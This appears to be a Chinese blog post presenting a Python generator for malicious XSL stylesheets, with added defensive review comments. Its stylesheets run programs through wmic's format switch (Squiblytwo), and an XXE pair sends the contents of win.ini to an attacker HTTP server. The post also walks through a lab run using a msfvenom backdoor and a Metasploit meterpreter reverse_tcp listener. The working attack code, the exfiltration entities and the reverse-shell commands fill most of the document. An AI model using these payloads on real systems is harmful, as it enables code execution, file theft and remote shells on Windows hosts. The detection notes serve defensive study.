python打造XslGenerator


0x00前言

今天載入了Demon哥分享的RSS。其中有一篇是三好學生講的:

 

在仔細閱讀這篇文章後,我懂得了裡面的一些騷操作,所以有了以下的指令碼。

0x01代碼

 

# Review notes (defensive context):
# This script writes XSL stylesheets that carry an msxsl/ms:script block.  When
# such a file is handed to wmic.exe through its format switch (the usage
# strings printed below show `wmic os get format:...`), the XSL processor runs
# the embedded JScript -- the behaviour commonly called "Squiblytwo"
# (ATT&CK T1220, XSL Script Processing).  The -j mode instead writes an XML
# external-entity (XXE) pair that the page associates with CVE-2018-0878
# (exploit-db 44352).  Detection points that follow directly from the code:
# wmic.exe command lines containing `format:` with a .xsl path or an http URL,
# wmic.exe spawning a child process (here calc.exe), and outbound HTTP from
# wmic.exe with file contents in the query string.  Mitigations: keep
# MSXML/Windows patched, restrict or audit wmic.exe and WScript.Shell through
# application control, and egress-filter hosts that have no business fetching
# remote stylesheets.
#
# The listing below keeps the author's code verbatim (including the curly
# quote characters produced by the page's transcription); only comments and
# docstrings were added.
import optparse
import time  # imported but never referenced in this file
import os
import socket


def main():
    """Parse three mutually exclusive flags and dispatch to one generator.

    -b -> Local(): write poc.xsl (wmic loads it from disk on the target)
    -y -> Long():  write Longpoc.xsl and move it into the Apache web root
    -j -> Cve():   write the XXE pair (xxe.xml + payload.xsl) and serve them
    With no flag, the optparse help is printed and the process exits.
    """
    parser=optparse.OptionParser()
    parser.add_option(‘-b‘,dest=‘local‘,action=‘store_true‘,help=‘Generator Local Xsl‘)
    parser.add_option(‘-y‘,dest=‘Long‘,action=‘store_true‘,help=‘Generator Long-range Xsl‘)
    parser.add_option(‘-j‘,dest=‘CVE‘,action=‘store_true‘,help=‘Conduct CVE-2018-0878‘)
    (options,args)=parser.parse_args()
    # First matching flag wins; any additional flags are silently ignored.
    if options.local:
        Local()
    elif options.Long:
        Long()
    elif options.CVE:
        Cve()
    else:
        parser.print_help()
        exit()


def Local():
    """Write poc.xsl into the current working directory.

    The stylesheet appears to be derived from a Microsoft-shipped wmic output
    format (note the Microsoft copyright header and the COMMAND/RESULTS/CIM
    templates that render CIM instances as comma-separated text), with an
    msxsl:script block added.  The root template calls user:myFunction(),
    which instantiates WScript.Shell and runs calc.exe, so whatever process
    applies the stylesheet (wmic.exe, per the printed instructions) spawns
    that program.  The print() calls are the author's usage notes only.
    """
    with open(‘poc.xsl‘,‘w‘) as l:
        # One long literal: stock CSV-style wmic templates plus the JScript
        # function invoked from the root template via user:myFunction().
        l.write(‘‘‘<?xml version="1.0"?><!-- Copyright (c) Microsoft Corporation.  All rights reserved. --><xsl:stylesheet version="1.0"      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"      xmlns:msxsl="urn:schemas-microsoft-com:xslt"      xmlns:user="urn:my-scripts"><xsl:output encoding="utf-16" omit-xml-declaration="yes"/><xsl:param name="norefcomma"/><msxsl:script language="JScript" implements-prefix="user">   function myFunction() {    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");          return "";         }</msxsl:script><xsl:template match="/"><xsl:value-of select="user:myFunction()"/>Node,<xsl:for-each select="COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.ARRAY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.REFERENCE"><xsl:value-of select="@NAME"/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each><xsl:apply-templates select="COMMAND/RESULTS"/></xsl:template> <xsl:template match="RESULTS" xml:space="preserve"><xsl:apply-templates select="CIM/INSTANCE"/></xsl:template> <xsl:template match="VALUE.ARRAY" xml:space="preserve">{<xsl:for-each select="VALUE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">;</xsl:if></xsl:for-each>}</xsl:template><xsl:template match="VALUE" xml:space="preserve"><xsl:value-of select="."/></xsl:template><xsl:template match="INSTANCE" 
xml:space="preserve"><xsl:value-of select="../../@NODE"/>,<xsl:for-each select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each></xsl:template> <xsl:template match="PROPERTY.REFERENCE" xml:space="preserve"><xsl:apply-templates select="VALUE.REFERENCE"></xsl:apply-templates></xsl:template><xsl:template match="PROPERTY"><xsl:apply-templates select="VALUE"/></xsl:template><xsl:template match="PROPERTY.ARRAY"><xsl:for-each select="VALUE.ARRAY"><xsl:apply-templates select="."/></xsl:for-each></xsl:template><xsl:template match="VALUE.REFERENCE">"<xsl:apply-templates select="INSTANCEPATH/NAMESPACEPATH"/><xsl:apply-templates select="INSTANCEPATH/INSTANCENAME|INSTANCENAME"/>"</xsl:template><xsl:template match="NAMESPACEPATH">\\<xsl:value-of select="HOST/text()"/><xsl:for-each select="LOCALNAMESPACEPATH/NAMESPACE">\<xsl:value-of select="@NAME"/></xsl:for-each>:</xsl:template><xsl:template match="INSTANCENAME"><xsl:value-of select="@CLASSNAME"/><xsl:for-each select="KEYBINDING"><xsl:if test="position()=1">.</xsl:if><xsl:value-of select="@NAME"/>="<xsl:value-of select="KEYVALUE/text()"/>"<xsl:if test="position()!=last()"></xsl:if><xsl:if test="not($norefcomma=&quot;true&quot;)">,</xsl:if><xsl:if test="$norefcomma=&quot;true&quot;"><xsl:text> </xsl:text></xsl:if></xsl:for-each></xsl:template></xsl:stylesheet>
        ‘‘‘)
        l.close()  # redundant: the with-block already closes the file
        print(‘[*]{}‘.format(‘Generation completion‘))
        print(‘[*]{}‘.format(‘you want to bounce meterpreter.Please create the back door and put the generated back door inito the clear computer,and use modify.py to modify the place where exe is executed‘))
        print(‘[*]{}‘.format(‘Enter the directory where you store poc.xsl and exeute the command in the target computer: wmic os get format:poc‘))


def Long():
    """Write Longpoc.xsl, then move it into /var/www/html via os.system.

    This variant is a minimal text-output stylesheet whose ms:script CDATA
    block runs calc.exe through WScript.Shell.  Moving it into the Apache web
    root means it is meant to be fetched over HTTP by wmic.exe on the target
    (see the last printed line).  The exit status of the `mv` is ignored, so a
    failed move is not reported.
    """
    with open(‘Longpoc.xsl‘,‘w‘) as g:
        # NOTE(review): as transcribed, `<stylesheetxmlns=` and the attributes
        # on the next line run together -- whitespace was probably lost when
        # the page was copied; the literal is kept exactly as it appears.
        g.write(‘‘‘<?xml version=‘1.0‘?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" 
xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0"><output method="text"/>    <ms:script implements-prefix="user" language="JScript">    <![CDATA[    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");    ]]> </ms:script></stylesheet>
        ‘‘‘)
        g.close()  # redundant: the with-block already closes the file
        print(‘[*]{}‘.format(‘Generation completion‘))
        # Shell-based move; Apache's default DocumentRoot on the author's
        # Ubuntu box.  Return value is not checked.
        os.system(‘mv Longpoc.xsl /var/www/html‘)
        print(‘[*]{}‘.format(‘This XSL is moved to the /var/www/html directory‘))
        print(‘[*]{}‘.format(‘Modify the program executed in XLS with modify.py‘))
        print(‘[*]{}‘.format(‘Put the generated back door into the target computer‘))
        print(‘[*]{}‘.format(‘Start the Apache service‘))
        print(‘[*]{}‘.format(‘wmic os get format:"http://IP/Longpoc.xsl"‘))


def Cve():
    """Write an out-of-band XXE pair and start a Python 2 HTTP server on 8080.

    Flow exactly as written:
      1. Learn this host's outbound IP: connect() on a UDP socket sends no
         datagram, it only fixes the local address the kernel would route
         from.  The socket is never closed.
      2. xxe.xml declares parameter entity `payload` (contents of
         C:/windows/win.ini) and `root`, which in turn declares `oob`, whose
         SYSTEM URL is http://<ip>/?<payload> -- the file contents travel to
         port 80 on this host as a query string.  Nothing in this script
         listens on 80; the author starts Apache separately.
      3. `mv payload.xls /var/www/html` runs before payload.xsl exists and
         names a different file from the one written next; its result is
         ignored.  xxe.xml itself is not moved, it stays in the cwd.
      4. payload.xsl is a DOCTYPE whose external parameter entity `remote`
         pulls xxe.xml from http://<ip>:8080/, then expands
         %remote;%root;%oob;.
      5. os.system(ml) serves the current directory (where xxe.xml was
         written) on port 8080 and blocks until the server is stopped.
    Defensive angle: the observable artefacts are wmic.exe making outbound
    HTTP requests (to 8080 and to 80 with a query string) -- both unusual for
    that binary and straightforward to alert on at the proxy or EDR layer.
    """
    print(‘[@]Vulnerability introduction:https://www.exploit-db.com/exploits/44352/‘)
    s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
    connect=s.connect((‘8.8.8.8‘,80))  # connect() returns None; `connect` is unused
    ip=s.getsockname()[0]  # local address chosen for the route to 8.8.8.8
    ml="python -m SimpleHTTPServer 8080"  # Python 2 module name; serves cwd
    with open(‘xxe.xml‘,‘w‘) as c:
        # Parameter-entity chain; the inner ‘http://{}/?%payload;‘ is the
        # out-of-band channel on port 80.
        c.write(‘‘‘<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  <!ENTITY % root "<!ENTITY &#37; oob SYSTEM ‘http://{}/?%payload;‘> ">          ‘‘‘.format(ip))
        c.close()  # redundant: the with-block already closes the file
        # Refers to payload.xls, which this function never creates; the
        # file written below is payload.xsl.  Exit status is ignored.
        os.system(‘mv payload.xls /var/www/html‘)
    with open(‘payload.xsl‘,‘w‘) as p:
        # DOCTYPE that fetches xxe.xml from the 8080 server and expands it.
        p.write(‘‘‘<?xml version="1.0" encoding="UTF-8" ?>  <!DOCTYPE zsl [  <!ENTITY % remote SYSTEM "http://{}:8080/xxe.xml">  %remote;%root;%oob;]>        ‘‘‘.format(ip))
        p.close()  # redundant: the with-block already closes the file
        # Only one {} in the format string, so `ip` is dropped from the output.
        print(‘[*]{}‘.format(‘Get the native IP:‘,ip))
        print(‘[*]{}‘.format(‘Create a httt server‘))
        print(‘[*]{}‘.format(‘Have been created xxe.xml‘))
        print(‘[*]{}‘.format(‘Already moved /var/www/html‘))
        print(‘[*]{}‘.format(‘Have benn payload.xls,Move him to the computer,And execute the command:wmic os get format:payload.xsl‘))
        # Blocks here until the HTTP server is interrupted.
        os.system(ml)


if __name__ == ‘__main__‘:
    main()

測試結果: -b

攻擊機:Ubuntu

受害者:windows server 2008 r2

產生並修改後的xsl

msfvenom產生的shell.exe

 Windows Server 2008 r2

 進入shell.exe所在的目錄中在cmd中執行:wmic os get /format:sd

Ubuntu中執行監聽:

use exploit/multi/headersset LHOST 192.168.223.133set LPORT 4444set PAYLOAD windows/x64/meterpreter/reverse_tcprun

測試結果:-j   CVE-2018-0878

漏洞結果詳情:https://www.exploit-db.com/exploits/44352/

產生了xxe.xml與payload.xls

xxe.xml移動到了/var/www/html  

payload.xls放入到受害者windows server 2008 r2

xxe.xml:

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  <!ENTITY % root "<!ENTITY &#37; oob SYSTEM ‘http://192.168.223.133:8080/?%payload;‘> ">  

payload.xsl:

<?xml version="1.0" encoding="UTF-8" ?>  <!DOCTYPE zsl [  <!ENTITY % remote SYSTEM "http://192.168.223.133:8080/xxe.xml">  %remote;%root;%oob;]>

 啟動apache服務

service apache2 start

在windows server 2008 r2中執行:

wmic os get /format:payload.xsl

執行失敗但漏洞觸發成功了。

 

這裡的-b選項我就不示範了,具體步驟跟上面兩個差不多

1.產生的poc.xsl修改在目標機上執行的程式並移動到apache2

2.開啟apache2

3.將產生的後門扔到目標機

4.執行wmic os get /format:"http://192.168.223.133/poc.xsl"

這時候wmic就會請求xsl並執行。你如果此刻在監聽你就收到了一個shell

 
